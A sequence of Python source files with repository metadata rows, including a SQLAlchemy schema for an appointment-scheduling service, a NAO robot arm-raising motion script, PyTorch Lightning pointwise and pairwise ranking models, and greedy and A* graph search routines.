| 31.569231 | 80 | 0.771442 | 273 | 2,052 | 5.593407 | 0.205128 | 0.05239 | 0.066798 | 0.102161 | 0.949574 | 0.91814 | 0.91814 | 0.91814 | 0.91814 | 0.91814 | 0 | 0.060403 | 0.128655 | 2,052 | 64 | 81 | 32.0625 | 0.793624 | 0.009747 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.044444 | false | 0 | 0.2 | 0 | 0.244444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
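The two tests above differ only in the pan value and which output channel carries the signal. At the extremes they assert, a linear taper sends everything to one channel; the gain formula below is an assumption consistent with those extremes (the exact mid-pan behavior of ATK's `LINEAR_TAPER` is not pinned down by these tests).

```python
# Sketch of a linear pan taper consistent with the extremes the tests assert:
# pan = -1 routes everything left, pan = +1 everything right. Mid-pan gains
# are an assumption, not taken from the ATK source.

def linear_pan_gains(pan):
    """Return (left_gain, right_gain) for pan in [-1, 1]."""
    return (1.0 - pan) / 2.0, (1.0 + pan) / 2.0

assert linear_pan_gains(-1) == (1.0, 0.0)  # hard left, as in Pan_linear_left_test
assert linear_pan_gains(1) == (0.0, 1.0)   # hard right, as in Pan_linear_right_test
```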
a10a7911ded0d566e2da5267e51c931ddf12dcfd | 5,308 | py | Python | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | import sqlalchemy
metadata = sqlalchemy.MetaData()
appointment_status = sqlalchemy.Table(
"appointment_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
schedule_status = sqlalchemy.Table(
"schedule_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
attendance_status = sqlalchemy.Table(
"attendance_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
units = sqlalchemy.Table(
"units",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("email", sqlalchemy.String(length=128)),
sqlalchemy.Column("phone", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("attendants_number", sqlalchemy.Integer()),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
appointments = sqlalchemy.Table(
"appointments",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("subjects.id_int"), type_=sqlalchemy.Integer, name="id_subject"),
sqlalchemy.Column(sqlalchemy.ForeignKey("schedules.id_int"), type_=sqlalchemy.Integer, name="id_schedule"),
sqlalchemy.Column(sqlalchemy.ForeignKey("attendances.id_int"), type_=sqlalchemy.Integer, name="id_attendance"),
sqlalchemy.Column(sqlalchemy.ForeignKey("appointment_status.id_int"), type_=sqlalchemy.Integer, name="id_appointment_status"),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("email", sqlalchemy.String(length=128)),
sqlalchemy.Column("national_registration", sqlalchemy.String(length=32)),
sqlalchemy.Column("arrived_at", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
subjects = sqlalchemy.Table(
"subjects",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
schedules = sqlalchemy.Table(
"schedules",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("units.id_int"), type_=sqlalchemy.Integer, name="id_unit"),
sqlalchemy.Column(sqlalchemy.ForeignKey("schedule_status.id_int"), type_=sqlalchemy.Integer, name="id_schedule_status"),
sqlalchemy.Column("id_employee", sqlalchemy.String(length=128)),
sqlalchemy.Column("schedule_date", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
attendances = sqlalchemy.Table(
"attendances",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("attendance_status.id_int"), type_=sqlalchemy.Integer, name="id_attendance_status"),
sqlalchemy.Column("id_employee", sqlalchemy.String(length=128)),
sqlalchemy.Column("rating", sqlalchemy.Integer()),
sqlalchemy.Column("start_time", sqlalchemy.DateTime()),
sqlalchemy.Column("end_time", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
| 43.508197 | 130 | 0.738508 | 558 | 5,308 | 6.894265 | 0.09319 | 0.286977 | 0.125812 | 0.103977 | 0.811282 | 0.799844 | 0.799844 | 0.783208 | 0.72758 | 0.722381 | 0 | 0.013702 | 0.106255 | 5,308 | 121 | 131 | 43.867769 | 0.797218 | 0 | 0 | 0.601942 | 0 | 0 | 0.152961 | 0.021313 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009709 | 0 | 0.009709 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
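Every table above repeats the same audit columns (`active`, `dflag`, `updated_at`, `created_at`) and, for the three status tables, the same name/code/description block. The sketch below shows the factoring pattern with plain tuples so it runs without SQLAlchemy or a database; the helper names are hypothetical, and in the real module the same idea would return fresh `sqlalchemy.Column` objects per table.

```python
# Sketch: factor the column groups that repeat across the tables above.
# Plain (name, type) tuples stand in for sqlalchemy.Column definitions.

def audit_columns():
    """Return the (name, type) pairs shared by every table above."""
    return [
        ("active", "Boolean"),
        ("dflag", "Boolean"),
        ("updated_at", "DateTime"),
        ("created_at", "DateTime"),
    ]

def status_table_columns(extra=()):
    """Columns for a *_status table: the common block plus any extras."""
    base = [("id_int", "Integer"), ("name", "String(128)"),
            ("code", "String(128)"), ("description", "String(256)")]
    return base + list(extra) + audit_columns()

cols = status_table_columns()
```

With real SQLAlchemy, the helpers must build new `Column` objects on each call, since a `Column` instance cannot be attached to more than one `Table`.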
a165803e0c1e00671de9dfdf655a76d11dea968b | 4,152 | py | Python | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | 1 | 2019-08-30T13:07:24.000Z | 2019-08-30T13:07:24.000Z | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | null | null | null | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | null | null | null |
from naoqi import ALProxy
IP = "192.168.0.125"
names = list()
times = list()
keys = list()
names.append("HeadPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("HeadYaw")
times.append([1, 2])
keys.append([[0, [3, -0.333333, 0], [3, 0.333333, 0]], [0, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LAnklePitch")
times.append([1, 2])
keys.append([[0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LAnkleRoll")
times.append([1, 2])
keys.append([[-0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LElbowRoll")
times.append([1, 2])
keys.append([[-0.410929, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.410929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LElbowYaw")
times.append([1, 2])
keys.append([[-1.19386, [3, -0.333333, 0], [3, 0.333333, 0]], [-1.19386, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHand")
times.append([1, 2])
keys.append([[0.3, [3, -0.333333, 0], [3, 0.333333, 0]], [0.3, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipPitch")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipRoll")
times.append([1, 2])
keys.append([[0.1, [3, -0.333333, 0], [3, 0.333333, 0]], [0.1, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipYawPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LKneePitch")
times.append([1, 2])
keys.append([[-0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LShoulderPitch")
times.append([1, 2])
keys.append([[1.4712, [3, -0.333333, 0], [3, 0.333333, 0]], [1.4468, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LShoulderRoll")
times.append([1, 2])
keys.append([[0.184555, [3, -0.333333, 0], [3, 0.333333, 0]], [0.217065, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LWristYaw")
times.append([1, 2])
keys.append([[0.0999997, [3, -0.333333, 0], [3, 0.333333, 0]], [0.0999997, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RAnklePitch")
times.append([1, 2])
keys.append([[0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RAnkleRoll")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RElbowRoll")
times.append([1, 2])
keys.append([[0.410929, [3, -0.333333, 0], [3, 0.333333, 0]], [0.410929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RElbowYaw")
times.append([1, 2])
keys.append([[1.19386, [3, -0.333333, 0], [3, 0.333333, 0]], [2.08197, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHand")
times.append([1, 2])
keys.append([[0.3, [3, -0.333333, 0], [3, 0.333333, 0]], [0.86, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipPitch")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipRoll")
times.append([1, 2])
keys.append([[-0.1, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.1, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipYawPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RKneePitch")
times.append([1, 2])
keys.append([[-0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RShoulderPitch")
times.append([1, 2])
keys.append([[1.4712, [3, -0.333333, 0], [3, 0.333333, 0]], [0.403929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RShoulderRoll")
times.append([1, 2])
keys.append([[-0.184555, [3, -0.333333, 0], [3, 0.333333, 0]], [0.0879278, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RWristYaw")
times.append([1, 2])
keys.append([[0.0999997, [3, -0.333333, 0], [3, 0.333333, 0]], [1.17641, [3, -0.333333, 0], [3, 0, 0]]])
def do2():
    # NAOqi's Python SDK targets Python 2, so the Python 2 except/print syntax is kept.
    try:
        motion = ALProxy("ALMotion", IP, 9559)
        motion.angleInterpolationBezier(names, times, keys)
    except BaseException, err:
        print err
| 34.6 | 106 | 0.560934 | 762 | 4,152 | 3.05643 | 0.091864 | 0.089309 | 0.267926 | 0.301417 | 0.787892 | 0.787892 | 0.787892 | 0.782739 | 0.767282 | 0.66681 | 0 | 0.293227 | 0.125241 | 4,152 | 119 | 107 | 34.890756 | 0.348018 | 0 | 0 | 0.4 | 0 | 0 | 0.068658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.011111 | null | null | 0.011111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
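The script above repeats an identical `names.append` / `times.append` / `keys.append` triple for every joint, with the same Bezier handles throughout. A small helper keeps the keyframe table compact; `add_joint` below is a hypothetical refactoring sketch, with handle values and joint names taken from the script.

```python
# Sketch: collapse the repeated append triples into one helper per joint.
# Bezier handle values mirror the ones used throughout the script above.

def add_joint(names, times, keys, name, start, end):
    """Append a two-keyframe Bezier track (at t=1s and t=2s) for one joint."""
    names.append(name)
    times.append([1, 2])
    keys.append([
        [start, [3, -0.333333, 0], [3, 0.333333, 0]],
        [end, [3, -0.333333, 0], [3, 0, 0]],
    ])

names, times, keys = [], [], []
add_joint(names, times, keys, "HeadPitch", -0.17, -0.17)
add_joint(names, times, keys, "RShoulderPitch", 1.4712, 0.403929)
```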
a16aca495cf86930d12c924513248215d3b2e1ef | 11,086 | py | Python | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | 19 | 2020-07-19T07:14:57.000Z | 2022-01-29T02:42:40.000Z | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | null | null | null | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | 10 | 2020-07-19T07:18:49.000Z | 2020-12-16T13:39:34.000Z | import numpy as np
import torch
from torch.utils.data import DataLoader
import pytorch_lightning as pl
from transformers import (
AdamW,
get_linear_schedule_with_warmup,
)
#emb_sz_rule from fastai: https://github.com/fastai/fastai/blob/master/fastai/tabular/data.py
def emb_sz_rule(n_cat:int)->int: return min(600, round(1.6 * n_cat**0.56))
class PointwiseFinetuner(pl.LightningModule):
def __init__(self, hparams,train_dataset,valid_dataset,test_dataset):
super(PointwiseFinetuner, self).__init__()
self.hparams = hparams
self.train_dataset = train_dataset
self.valid_dataset = valid_dataset
self.test_dataset = test_dataset
#construct layers
self.n_cat = sum([emb_sz_rule(i) for i in self.hparams.cat_dims])
self.n_num = self.hparams.n_num
self.emb = torch.nn.ModuleList([torch.nn.Embedding(i, emb_sz_rule(i)) for i in self.hparams.cat_dims])
self.emb_droupout = torch.nn.Dropout(self.hparams.emb_drop)
self.head = torch.nn.Sequential(
torch.nn.Linear(self.n_cat + self.n_num, self.hparams.num_hidden),
torch.nn.Dropout(p=self.hparams.drop),
torch.nn.Linear(self.hparams.num_hidden, 1),
# torch.nn.Sigmoid()
)
#loss
self.loss_fn = torch.nn.MSELoss()
def forward(self,inp):
cat_x = inp['cat_feature']
cat_x = [e(cat_x[:,i]) for i,e in enumerate(self.emb)]
cat_x = torch.cat(cat_x, 1)
cat_x = self.emb_droupout(cat_x)
x = torch.cat([cat_x,inp['num_feature']],1)
x = self.head(x)
# x = (self.hparams.y_range[1]-self.hparams.y_range[0]) * x + self.hparams.y_range[0]
return x
def _step(self, batch):
preds = self.forward(batch)
loss = self.loss_fn(preds, batch['label'])
return loss, preds
def training_step(self, batch, batch_nb):
loss, _ = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_epoch_end(self, outputs):
avg_val_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_val_loss,}
return {'val_loss': avg_val_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def test_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def test_epoch_end(self, outputs):
avg_test_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'test_loss': avg_test_loss,}
return {'test_loss': avg_test_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def configure_optimizers(self):
no_decay = ["bias"]
optimizer_grouped_parameters = [
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
},
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
eps=self.hparams.adam_epsilon,
)
self.opt = optimizer
return [optimizer]
def optimizer_step(
self, epoch, batch_idx, optimizer, optimizer_idx, second_order_closure=None,
on_tpu=False, using_native_amp=False, using_lbfgs=False
):
optimizer.step()
optimizer.zero_grad()
self.lr_scheduler.step()
def train_dataloader(self):
dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.per_device_train_batch_size,
drop_last=True,
shuffle=True,
num_workers=0,
)
#calculate total timesteps
t_total = (
(
len(dataloader.dataset)
// (self.hparams.per_device_train_batch_size * max(1, self.hparams.n_gpu))
)
// self.hparams.gradient_accumulation_steps
* float(self.hparams.num_train_epochs)
)
#create scheduler
scheduler = get_linear_schedule_with_warmup(
self.opt,
num_warmup_steps=self.hparams.warmup_steps,
num_training_steps=t_total,
)
self.lr_scheduler = scheduler
return dataloader
def val_dataloader(self):
return DataLoader(
self.valid_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
def test_dataloader(self):
return DataLoader(
self.test_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
class PairwiseFinetuner(pl.LightningModule):
def __init__(self, hparams,train_dataset,valid_dataset,test_dataset):
super(PairwiseFinetuner, self).__init__()
self.hparams = hparams
self.train_dataset = train_dataset
self.valid_dataset = valid_dataset
self.test_dataset = test_dataset
#construct layers
self.n_cat = sum([emb_sz_rule(i) for i in self.hparams.cat_dims])
self.n_num = self.hparams.n_num
self.emb = torch.nn.ModuleList([torch.nn.Embedding(i, emb_sz_rule(i)) for i in self.hparams.cat_dims])
self.emb_droupout = torch.nn.Dropout(self.hparams.emb_drop)
self.head = torch.nn.Sequential(
torch.nn.Linear(self.n_cat + self.n_num, self.hparams.num_hidden),
torch.nn.Dropout(p=self.hparams.drop),
torch.nn.Linear(self.hparams.num_hidden, 1),
# torch.nn.Sigmoid()
)
#loss
# self.loss_fn = torch.nn.BCELoss()
self.loss_fn = torch.nn.BCEWithLogitsLoss()
    def predict(self, inp):
        # inference-time scoring: run only the "i" branch to score a single item
        cat_i = inp['cat_feature_i']
cat_i = [e(cat_i[:,idx]) for idx,e in enumerate(self.emb)]
cat_i = torch.cat(cat_i, 1)
cat_i = self.emb_droupout(cat_i)
x_i = torch.cat([cat_i,inp['num_feature_i']],1)
x_i = self.head(x_i)
return x_i
def forward(self,inp):
#i
cat_i = inp['cat_feature_i']
cat_i = [e(cat_i[:,idx]) for idx,e in enumerate(self.emb)]
cat_i = torch.cat(cat_i, 1)
cat_i = self.emb_droupout(cat_i)
x_i = torch.cat([cat_i,inp['num_feature_i']],1)
x_i = self.head(x_i)
#j
cat_j = inp['cat_feature_j']
cat_j = [e(cat_j[:,idx]) for idx,e in enumerate(self.emb)]
cat_j = torch.cat(cat_j, 1)
cat_j = self.emb_droupout(cat_j)
x_j = torch.cat([cat_j,inp['num_feature_j']],1)
x_j = self.head(x_j)
return x_i-x_j
def _step(self, batch):
preds = self.forward(batch)
loss = self.loss_fn(preds, batch['label'])
return loss, preds
def training_step(self, batch, batch_nb):
loss, _ = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_epoch_end(self, outputs):
avg_val_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_val_loss,}
return {'val_loss': avg_val_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def test_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def test_epoch_end(self, outputs):
avg_test_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'test_loss': avg_test_loss,}
return {'test_loss': avg_test_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def configure_optimizers(self):
no_decay = ["bias"]
optimizer_grouped_parameters = [
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
},
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
eps=self.hparams.adam_epsilon,
)
self.opt = optimizer
return [optimizer]
def optimizer_step(
self, epoch, batch_idx, optimizer, optimizer_idx, second_order_closure=None,
on_tpu=False, using_native_amp=False, using_lbfgs=False
):
optimizer.step()
optimizer.zero_grad()
self.lr_scheduler.step()
def train_dataloader(self):
dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.per_device_train_batch_size,
drop_last=True,
shuffle=True,
num_workers=0,
)
#calculate total timesteps
t_total = (
(
len(dataloader.dataset)
// (self.hparams.per_device_train_batch_size * max(1, self.hparams.n_gpu))
)
// self.hparams.gradient_accumulation_steps
* float(self.hparams.num_train_epochs)
)
#create scheduler
scheduler = get_linear_schedule_with_warmup(
self.opt,
num_warmup_steps=self.hparams.warmup_steps,
num_training_steps=t_total,
)
self.lr_scheduler = scheduler
return dataloader
def val_dataloader(self):
return DataLoader(
self.valid_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
def test_dataloader(self):
return DataLoader(
self.test_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
) | 35.532051 | 110 | 0.58416 | 1,384 | 11,086 | 4.401012 | 0.119942 | 0.077656 | 0.021671 | 0.026268 | 0.904285 | 0.879494 | 0.875882 | 0.875882 | 0.875882 | 0.870793 | 0 | 0.004301 | 0.307866 | 11,086 | 312 | 111 | 35.532051 | 0.789522 | 0.033556 | 0 | 0.756757 | 0 | 0 | 0.040748 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.019305 | 0.019305 | 0.223938 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
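`PairwiseFinetuner` scores each item of a pair and applies `BCEWithLogitsLoss` to the score difference. For a pair where item i should rank above item j (label 1), that objective reduces to the RankNet-style pairwise logistic loss log(1 + exp(-(s_i - s_j))). The pure-Python sketch below illustrates that reduction; it is not part of the trainer itself.

```python
import math

# What BCEWithLogitsLoss on a score difference computes for label 1:
# the RankNet-style pairwise logistic loss used by PairwiseFinetuner above.

def pairwise_logistic_loss(score_i, score_j):
    """Loss for "i should rank above j": log(1 + exp(-(s_i - s_j)))."""
    diff = score_i - score_j
    # log(1 + exp(-diff)) written stably for large |diff|
    return math.log1p(math.exp(-abs(diff))) + max(-diff, 0.0)

# A correctly ordered pair (i scored higher) is penalized less than a reversed one.
assert pairwise_logistic_loss(2.0, 0.0) < pairwise_logistic_loss(0.0, 2.0)
```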
a16ce9c23970e75e71335bd37f3a91e44c816c88 | 4,399 | py | Python | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | from SearchNode import SearchNode
from Queue import PriorityQueue
"""
Performs a greedy search on the given problem using the provided heuristic function
heuristic should be a function h(p, n) that returns an estimate for the distance from node n to the
solution of problem p. It will be passed the problem and the current node.
"""
def greedy(problem, heuristic):
current_node = SearchNode(problem.start_node, None, 0)
frontier = PriorityQueue()
# elements of the priority queue are 2-element lists of the form (priority, data)
frontier.put([0, current_node])
explored = set()
while True:
if frontier.empty():
return None
queue_element = frontier.get()
current_node = queue_element[1]
# goal test
if problem.goal_test(current_node.node):
return current_node.to_path() # return solution as path
# add node ID to explored set
explored.add(current_node.node.id)
for edge in current_node.node.edges():
child = None
if edge.child().id != current_node.node.id:
child = edge.child()
elif not edge.directed() and edge.parent().id != current_node.node.id:
child = edge.parent()
if child is not None:
weight = float(edge['weight'])
child_node = SearchNode(child, current_node, weight)
fn = heuristic(problem, child) # value given by the evaluation function for this node
# check that child is not in explored or frontier
child_in_explored = child.id in explored
child_in_frontier = False
for item in frontier.queue:
if item[1].node.id == child.id:
child_in_frontier = True
# if the child has a lower heuristic score, replace the frontier node with child
if fn < item[0]:
item[0] = fn
item[1] = child_node
if not child_in_explored and not child_in_frontier:
frontier.put([fn, child_node])
"""
Performs A* search on the given problem using the given heuristic function
heuristic should be a function h(p, n) that returns an estimate for the distance from node n to the
solution of problem p. It will be passed the problem and the current node.
"""
def a_star(problem, heuristic):
current_node = SearchNode(problem.start_node, None, 0)
frontier = PriorityQueue()
# elements of the priority queue are 2-element lists of the form (priority, data)
frontier.put([0, current_node])
explored = set()
while True:
if frontier.empty():
return None
queue_element = frontier.get()
current_node = queue_element[1]
current_node_path_cost = current_node.get_path_cost()
# goal test
if problem.goal_test(current_node.node):
return current_node.to_path() # return solution as path
# add node ID to explored set
explored.add(current_node.node.id)
for edge in current_node.node.edges():
child = None
if edge.child().id != current_node.node.id:
child = edge.child()
elif not edge.directed() and edge.parent().id != current_node.node.id:
child = edge.parent()
if child is not None:
weight = float(edge['weight'])
child_node = SearchNode(child, current_node, weight)
child_path_cost = current_node_path_cost + weight
fn = child_path_cost + heuristic(problem, child)
# check that child is not in explored or frontier
child_in_explored = child.id in explored
child_in_frontier = False
for item in frontier.queue:
if item[1].node.id == child.id:
child_in_frontier = True
# if the child has a lower evaluation, replace the frontier node with child
if fn < item[0]:
item[0] = fn
item[1] = child_node
if not child_in_explored and not child_in_frontier:
frontier.put([fn, child_node])
